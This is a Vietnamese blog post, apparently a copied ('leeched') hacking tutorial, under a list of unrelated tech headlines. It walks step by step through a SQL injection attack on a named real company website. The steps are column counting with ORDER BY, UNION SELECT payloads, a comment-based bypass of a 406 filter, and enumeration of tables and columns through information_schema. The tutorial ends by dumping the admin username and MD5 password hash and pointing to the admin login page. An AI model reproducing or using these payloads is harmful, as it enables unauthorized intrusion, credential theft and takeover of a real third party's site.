Lỗi bug trong Gmail Android cho phép bất cứ ai cũng có thể gửi email giả mạo
15 bức ảnh khoa học tuyệt đẹp trong năm 2015
Tổng hợp game mobile đua xe đáng chơi nhất 2015
Key bản quyền Sublime Text 3 (2015-2016)
Lenovo nói gì về sự cố máy tính cài sẵn phần mềm gián điệp?
Top 10 ngôn ngữ lập trình dễ bị Hack
Nguyễn Hà Đông giải thích lý do game mới Swing Copters 2 'từ chối' người Việt
Mark Zuckerberg học theo Iron Man: phát triển trợ lý ảo như 'Jarvis'
Bước 1: ở đuôi id=202 các bạn thêm dấu ' ở đây để xem nó xuất hiện lỗi
Bước 2: Sau khi đã thêm dấu ' ở số 202 là 202' thì website hiện lỗi hoặc mất hết tên sản phẩm nhưng ở đây nó có các dòng lỗi
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/kthong/public_html/sources/site/products.php on line 45...
Bước 3: Đã xác định nó dính lỗi SQLi các bạn xóa dấu ' thay bằng order by 1-- - => thấy site bt
http://khaithong.com.vn/index.php?do=products&id=202 order by 1-- -
tiếp tục dò 1->10 nhiều site có thể là tới 30 tứi 50...
order by 4-- - => thấy site bt
order by 5-- - => site mất hết danh mục...
=> lỗi nằm ở 4
Ta khai triển xóa order by 4-- thay bằng UNION SELECT 1,2,3,4-- - VÀ NHỚ THÊM DẤU - TRƯỚC ID SẢN PHẨM VÍ DỤ id=-123 http://khaithong.com.vn/index.php?do=products&id=-205 UNION SELECT 1,2,3,4-- -
Thấy site nó Not Acceptable và trên title web có chữ 406 Not Acceptable có nghĩa là lỗi 406 Ta by pass thêm /*! / vào union và select
=> http://khaithong.com.vn/index.php?do=products&id=-205 /*!UNION SELECT*/ 1,2,3,4-- -
Sau đó ta lại thấy có 1 con số "2" xuất hiện => lỗi version ở 2 thay chữ version() vào số 2 Thay bằng /*!UNION SELECT*/ 1,version(),3,4-- -
http://khaithong.com.vn/index.php?do=products&id=-205 /*!UNION SELECT*/ 1,version(),3,4-- - 5.1.70-cll => cho ta thấy version nó
Và tiếp tục thay chữ "vesion()" thành group_concat(/*!table_name*/) và xóa dấu -- - thay bằng đoạn from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
http://khaithong.com.vn/index.php?do=products&id=-205 /*!UNION SELECT*/ 1,group_concat(/*!table_name*/),3,4 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
Vì sao ở đây mình có các loại dấu /*! */ là do lỗi 406 phải cần bypass sau đó nó ra 1 đoạn
admin,baogia,category,danhmuc,news,page,products,tygia bạn thấy cái nào khả nghi? admin => cái ta cần tìm...
Bạn vào http://www.string-functions.com/string-hex.aspx mã hóa chữ "admin" thành "61646d696e" Giải quyết query tiếp theo là thay đoạn
(/*!table_name*/) = (/*!column_name*/)
/*!tables*/ = /*!columns*/
database() = 0x61646d696e
=> http://khaithong.com.vn/index.php?do=products&id=-205 /*!UNION SELECT*/ 1,group_concat(/*!column_name*/),3,4 from information_schema./*!columns*/ where /*!table_name*/=0x61646d696e-- -
lại xuất hiện id,username,password,email,id,username,password,email khả nghi là gì ta? là username và password
=======> Bước này quan trọng
Bạn thay (/*!column_name*/) = (/*!username,0x3a,password*/)
Xóa hết đoạn from...-- - thay bằng from admin-- - vì admin là bước khai thác để tìm ra user và pass
=> http://khaithong.com.vn/index.php?do=products&id=-205 /*!UNION SELECT*/ 1,group_concat(/*!username,0x3a,password*/),3,4 from admin-- -
Nó ra đoạn khaithongcomputer:d452cea53f9a0669edc5078e1273db2e
nghĩa là user là khaithongcomputer còn đoạn dãi số lung tung kia là pass những nó đã bị mã hóa bạn cần tìm tool crack tốt tên đoạn mã là MD5.
và tìm nơi đăng nhập admin là ok. Ở website này nơi đăng nhập là http://khaithong.com.vn/admin.php
Tut leech
0 comments so far,add yours
Cám ơn đã ghé thăm BlogCNTT!
- Mọi thắc mắc, gợi ý hoặc bình luận xin chia sẻ bên dưới hoặc Liên Hệ
- Hãy viết bằng tiếng Việt có dấu để mọi người dễ đọc hơn!
Thank You!